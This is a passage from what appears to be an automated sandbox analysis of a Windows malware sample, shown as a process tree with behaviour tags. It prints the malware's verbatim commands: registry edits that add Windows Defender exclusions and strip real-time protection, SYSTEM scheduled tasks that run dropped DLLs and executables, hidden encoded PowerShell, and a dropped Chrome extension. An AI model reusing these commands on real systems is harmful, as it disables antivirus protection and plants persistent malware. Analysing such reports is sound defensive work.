                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:976
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:2396
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:540
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BeEwQyQINcRtuKICoSR" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                            PID:716
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BeEwQyQINcRtuKICoSR" /t REG_DWORD /d 0 /reg:64
                                                                                                            4⤵
                                                                                                              PID:904
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\REeMUtPoCvFU2" /t REG_DWORD /d 0 /reg:32
                                                                                                              4⤵
                                                                                                                PID:1720
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\REeMUtPoCvFU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                4⤵
                                                                                                                  PID:1596
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RcAuZGsZhuUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                  4⤵
                                                                                                                    PID:1012
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RcAuZGsZhuUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                    4⤵
                                                                                                                      PID:1052
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kLpsRMujXEpbC" /t REG_DWORD /d 0 /reg:32
                                                                                                                      4⤵
                                                                                                                        PID:3044
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kLpsRMujXEpbC" /t REG_DWORD /d 0 /reg:64
                                                                                                                        4⤵
                                                                                                                          PID:908
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tffvHWJZU" /t REG_DWORD /d 0 /reg:32
                                                                                                                          4⤵
                                                                                                                            PID:1948
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tffvHWJZU" /t REG_DWORD /d 0 /reg:64
                                                                                                                            4⤵
                                                                                                                              PID:2324
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NGysLhxJEZNwhMVB" /t REG_DWORD /d 0 /reg:32
                                                                                                                              4⤵
                                                                                                                                PID:2644
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NGysLhxJEZNwhMVB" /t REG_DWORD /d 0 /reg:64
                                                                                                                                4⤵
                                                                                                                                  PID:784
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                  4⤵
                                                                                                                                    PID:1048
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                    4⤵
                                                                                                                                      PID:2512
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj" /t REG_DWORD /d 0 /reg:32
                                                                                                                                      4⤵
                                                                                                                                        PID:2444
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj" /t REG_DWORD /d 0 /reg:64
                                                                                                                                        4⤵
                                                                                                                                          PID:2428
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:32
                                                                                                                                          4⤵
                                                                                                                                            PID:2092
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:64
                                                                                                                                            4⤵
                                                                                                                                              PID:2128
                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            schtasks /CREATE /TN "gpjOVCSmH" /SC once /ST 16:34:08 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                            3⤵
                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                            PID:2624
                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            schtasks /run /I /tn "gpjOVCSmH"
                                                                                                                                            3⤵
                                                                                                                                              PID:2920
                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                              schtasks /DELETE /F /TN "gpjOVCSmH"
                                                                                                                                              3⤵
                                                                                                                                                PID:2780
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                                                                                3⤵
                                                                                                                                                  PID:2328
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                                                                                    4⤵
                                                                                                                                                      PID:2024
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                                                                                    3⤵
                                                                                                                                                      PID:2216
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                                                                                        4⤵
                                                                                                                                                          PID:2304
                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                        schtasks /CREATE /TN "WFVPvOFzrjCnPPlbL" /SC once /ST 21:58:38 /RU "SYSTEM" /TR "\"C:\Windows\Temp\mrYrpJCpOmktZWwz\vkQZSkunSJsHwFm\mzorGjf.exe\" 7d /boNqdiduI 525403 /S" /V1 /F
                                                                                                                                                        3⤵
                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                        PID:2076
                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                        schtasks /run /I /tn "WFVPvOFzrjCnPPlbL"
                                                                                                                                                        3⤵
                                                                                                                                                          PID:1868
                                                                                                                                                      • C:\Windows\Temp\mrYrpJCpOmktZWwz\vkQZSkunSJsHwFm\mzorGjf.exe
                                                                                                                                                        C:\Windows\Temp\mrYrpJCpOmktZWwz\vkQZSkunSJsHwFm\mzorGjf.exe 7d /boNqdiduI 525403 /S
                                                                                                                                                        2⤵
                                                                                                                                                        • Checks computer location settings
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Drops Chrome extension
                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                        PID:1236
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                          3⤵
                                                                                                                                                            PID:2956
                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                              4⤵
                                                                                                                                                                PID:3036
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:2840
                                                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                      6⤵
                                                                                                                                                                        PID:2284
                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:2544
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:1580
                                                                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                            6⤵
                                                                                                                                                                              PID:652
                                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:804
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                              5⤵
                                                                                                                                                                                PID:1104
                                                                                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                  6⤵
                                                                                                                                                                                    PID:1748
                                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:2604
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                    5⤵
                                                                                                                                                                                      PID:1436
                                                                                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                        6⤵
                                                                                                                                                                                          PID:2268
                                                                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:2392
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                          5⤵
                                                                                                                                                                                            PID:2880
                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                              6⤵
                                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                              PID:2084
                                                                                                                                                                                              • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                7⤵
                                                                                                                                                                                                  PID:1988
                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                          schtasks /DELETE /F /TN "butYHpXTvMdZIJsEKZ"
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:812
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:604
                                                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:2852
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                      PID:1424
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                        PID:1260
                                                                                                                                                                                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                          PID:1188
                                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:280
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                          PID:2640
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                            PID:1524
                                                                                                                                                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                              PID:2448
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\tffvHWJZU\TvFnMd.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "oiGBDDjiIQmhwtu" /V1 /F
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                      PID:1500
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /CREATE /TN "oiGBDDjiIQmhwtu2" /F /xml "C:\Program Files (x86)\tffvHWJZU\AjNDrpB.xml" /RU "SYSTEM"
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                      PID:1436
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /END /TN "oiGBDDjiIQmhwtu"
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:1420
                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                        schtasks /DELETE /F /TN "oiGBDDjiIQmhwtu"
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:1460
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /CREATE /TN "mVOvxPujqogGhF" /F /xml "C:\Program Files (x86)\REeMUtPoCvFU2\qyKqqKg.xml" /RU "SYSTEM"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                          PID:2500
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /CREATE /TN "PuKixiXcCNlkt2" /F /xml "C:\ProgramData\NGysLhxJEZNwhMVB\LSwYRZv.xml" /RU "SYSTEM"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                          PID:2688
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /CREATE /TN "PNkVCGbsoOwbzBvhS2" /F /xml "C:\Program Files (x86)\BeEwQyQINcRtuKICoSR\SoMuMtV.xml" /RU "SYSTEM"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                          PID:2396
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /CREATE /TN "OEjxyANCnYwFWrViDzJ2" /F /xml "C:\Program Files (x86)\kLpsRMujXEpbC\cqRHAex.xml" /RU "SYSTEM"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                          PID:844
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /CREATE /TN "dSPsRFCNvoTMekFez" /SC once /ST 09:04:55 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\mrYrpJCpOmktZWwz\PtDLaWSh\HFEoPxA.dll\",#1 /ZMsgdidIMb 525403" /V1 /F
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                          PID:1680
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /run /I /tn "dSPsRFCNvoTMekFez"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:1012
                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                            schtasks /DELETE /F /TN "WFVPvOFzrjCnPPlbL"
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:2452
                                                                                                                                                                                                          • C:\Windows\system32\rundll32.EXE
                                                                                                                                                                                                            C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\mrYrpJCpOmktZWwz\PtDLaWSh\HFEoPxA.dll",#1 /ZMsgdidIMb 525403
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:1052
                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\mrYrpJCpOmktZWwz\PtDLaWSh\HFEoPxA.dll",#1 /ZMsgdidIMb 525403
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • Blocklisted process makes network request
                                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                                PID:2612
                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                  schtasks /DELETE /F /TN "dSPsRFCNvoTMekFez"
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:280
                                                                                                                                                                                                            • C:\Windows\system32\taskeng.exe
                                                                                                                                                                                                              taskeng.exe {6F0AD1F3-AEF4-4D49-B97E-2D041C2AB0C9} S-1-5-21-2248906074-2862704502-246302768-1000:GHPZRGFC\Admin:Interactive:[1]
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:1752
                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                  PID:1808
                                                                                                                                                                                                                  • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:344
                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                    PID:1048
                                                                                                                                                                                                                    • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                                      "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:2656
                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                      • Drops file in System32 directory
